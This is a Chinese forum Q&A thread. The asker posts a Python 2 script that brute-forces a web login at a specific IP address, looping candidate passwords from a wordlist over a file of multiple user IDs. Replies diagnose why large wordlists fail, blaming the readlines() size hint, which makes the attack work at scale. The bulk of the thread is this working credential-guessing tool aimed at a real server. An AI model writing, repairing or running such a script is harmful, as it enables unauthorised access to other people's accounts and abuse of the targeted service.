我用自己的账号去尝试暴力破解,候选密码保存在本地txt文件。发现当候选密码较少时(大概几百几千个),可以正确找到密码,当数据较大(大概几十万个)的时候就找不到正确的密码,但是正确的密码就在文件里面了,这是为什么?
def try_pwd(userid,pwd): #提交数据函数 myurl = 'http://222.200.98.147/login!doLogin.action' postdata = urllib.urlencode({'account':userid, 'pwd':pwd, 'verifycode':''}) header = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'} request = urllib2.Request(url=myurl, data=postdata, headers=header) try: acp_login = urllib2.urlopen(request,timeout=10) except urllib2.HTTPError,e: print e.reason,e.code re_info = acp_login.read() if re_info == '{"msg":"/login!welcome.action","status":"y"}': print 'ID:',userid print 'password:', pwd isfind = True else: # print 'None' isfind = False return isfind start_time = time.time() print 'Start...' userID_file = open('e:\\userID.txt','r') #userID.txt为账号文件 for userID in userID_file.readlines(100): userID = userID.strip('\n') pwd_file = open('e:\\pwd2.txt','r') #pwd2.txt为密码文件 for t_pwd in pwd_file.readlines(10000): t_pwd = t_pwd.strip('\r\n') isfind = try_pwd(userid=userID,pwd= t_pwd) if isfind == True: break if isfind == False: print userID, u'没有匹配' pwd_file.close() userID_file.close() end_time = time.time() print "total time: ",end_time-start_time
刚刚试了一下,去了readlines中的参数,又可以了 ?_?
1.请贴代码
2.你确定你遍历完了所有密码吗
readlines(hint=-1)
Read and return a list of lines from the stream. hint can be specified to control the number of lines read: no more lines will be read if the total size (in bytes/characters) of all lines so far exceeds hint.
Note that it’s already possible to iterate on file objects using for line in file: ... without calling file.readlines().
https://docs.python.org/3.3/l...
你的代码只读了100行,正确的密码应该在100行以后